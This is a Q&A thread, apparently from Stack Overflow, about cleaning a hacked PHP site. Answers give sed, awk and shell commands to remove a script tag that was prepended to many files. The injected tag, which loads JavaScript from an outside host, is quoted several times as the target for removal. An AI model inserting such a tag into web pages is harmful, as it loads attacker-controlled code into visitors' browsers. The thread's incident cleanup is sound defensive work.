0

Someone has managed to infect a lot of my files with the following code:

<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>

The script tag has been prepended to a lot of .php files. I'm trying to use the sed command to fix these files. My pattern is not matching for some reason even though in online regular expression testers it works. This is what I have:

sed '/<script type=\'text\/javascript\' async src=\'https:\/\/eaglelocation.xyz\/ds.js&\'\>\<\/script>/d' index.php

Just for more information the script tag has been prepended right at the top of the file and is also connected to the opening php tag like so </script><?php

Aayush
  • 1
    I guess a full restore from source control or at least a backup would be preferable. The baddies might have poked some more holes. – wp78de Jun 24 '19 at 22:02
  • 3
    You can't escape quotes inside single-quoted strings. See https://stackoverflow.com/questions/1250079/how-to-escape-single-quotes-within-single-quoted-strings – Barmar Jun 24 '19 at 22:11
  • A does-it-all command could look like this: `grep -rl " – wp78de Jun 24 '19 at 22:25

2 Answers

1

There are multiple issues with your sed usage:

  • You mix single quotes as pattern delimiters and as part of the JS code. Use double quotes as pattern wrappers.
  • You escape too much inside the pattern. To make it easier to comprehend, I use % instead of / as a pattern delimiter.
  • As malicious code may be placed on the same line as good code, I don't use the d sed command, but s (replace) with -i (in place).

See below:

$ cat test.php
<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script><?php
echo '<p>Hello World</p>'; ?>
$ sed -i  "s%<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>%%"  test.php
$ cat test.php
<?php
echo '<p>Hello World</p>'; ?>
mrzasa
  • Tried this, it outputs the file with the script tag still intact. I don't think it is matching. Just for your information the script tag has been prepended right at the top of the file and is also connected to the opening php tag like so php – Aayush Jun 25 '19 at 06:19
  • Please, see the new version of my answer. – mrzasa Jun 25 '19 at 07:51
1

sed doesn't understand literal strings (see Is it possible to escape regex metacharacters reliably with sed) but awk does. If it's on a single line then to remove the string:

<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>

from a file is this:

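awk '
    # Take the literal string from the first argument, then blank it so awk does not open it as a file
    BEGIN { str=ARGV[1]; ARGV[1]="" }
    # index() is a plain string search: keep the text before the match and the text after it
    s=index($0,str) { $0=substr($0,1,s-1) substr($0,s+length(str)) }
1' "<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>" file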

To make that change to all .php files using GNU awk for "inplace" editing would be:

find . -type f -name '*.php' -exec \
awk -i inplace '
    BEGIN { str=ARGV[1]; ARGV[1]="" }
    s=index($0,str) { $0=substr($0,1,s-1) substr($0,s+length(str)) }
1' "<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>" {} +
Ed Morton
  • I'm not familiar with awk. awk: cmd. line:3: s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str) } – Aayush Jun 25 '19 at 06:16
  • I also tried the second command to run on a single file by changing the *.php to index.php like so find . -type f -name 'index.php' -exec \ awk -i inplace 'BEGIN { str=ARGV[1]; ARGV[1]="" } s=index($0,str) { $0=substr($0,s-1) substr($0,s+length(str) } 1' "" {} + – Aayush Jun 25 '19 at 06:25
  • I got: find: ' awk': No such file or directory – Aayush Jun 25 '19 at 06:25
  • I fixed the missing `)` in the script. That's one problem with not providing sample input/output in your question for us to test against - then we don't have anything to test against so you get untested scripts posted in our answers. If you just execute the `find` command I posted as-is then you won't get an error message of `find: ' awk': No such file or directory`. – Ed Morton Jun 25 '19 at 10:17
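
The literal-string removal discussed in the answers above, as an added example that is not code from either answer: it finds the `.php` files containing the tag with a fixed-string `grep`, copies each original to a backup directory, then strips every occurrence with `index()`/`substr()`. The function names and the backup layout are assumptions; it uses only POSIX sh and awk, so GNU awk's `-i inplace` is not required.

```shell
#!/bin/sh
# Added example. TAG is the string from the question; the function names,
# directory arguments and backup layout are assumptions made for illustration.
TAG="<script type='text/javascript' async src='https://eaglelocation.xyz/ds.js&'></script>"

# strip_literal FILE: print FILE with every occurrence of TAG removed.
# index()/substr() compare plain strings, so '.', '/' and '&' need no escaping.
strip_literal() {
    TAG="$TAG" awk '
        BEGIN { str = ENVIRON["TAG"]; len = length(str) }
        {
            while ((s = index($0, str)) > 0)
                $0 = substr($0, 1, s - 1) substr($0, s + len)
            print
        }' "$1"
}

# clean_tree DIR BACKUP_DIR: clean each *.php under DIR that contains TAG and
# print how many files were changed. Originals are copied to BACKUP_DIR first;
# keep that directory outside the web root and pass DIR without ".." parts.
# File names containing newlines are not supported by the read loop.
clean_tree() (
    dir=$1 backup=$2 count=0
    list=$(mktemp) && tmp=$(mktemp) || exit 1
    # grep -F matches a fixed string; it exits 1 when no file matches.
    find "$dir" -type f -name '*.php' -exec grep -lF -e "$TAG" {} + > "$list" || :
    while IFS= read -r f; do
        mkdir -p "$backup/$(dirname "$f")" && cp -p "$f" "$backup/$f" || exit 1
        # Writing with cat into the original keeps its owner and mode.
        strip_literal "$f" > "$tmp" && cat "$tmp" > "$f" || exit 1
        count=$((count + 1))
    done < "$list"
    rm -f "$list" "$tmp"
    echo "$count"
)
```

Running `clean_tree` a second time on the same tree should print `0`; any other result means files are being re-infected and the entry point is still open.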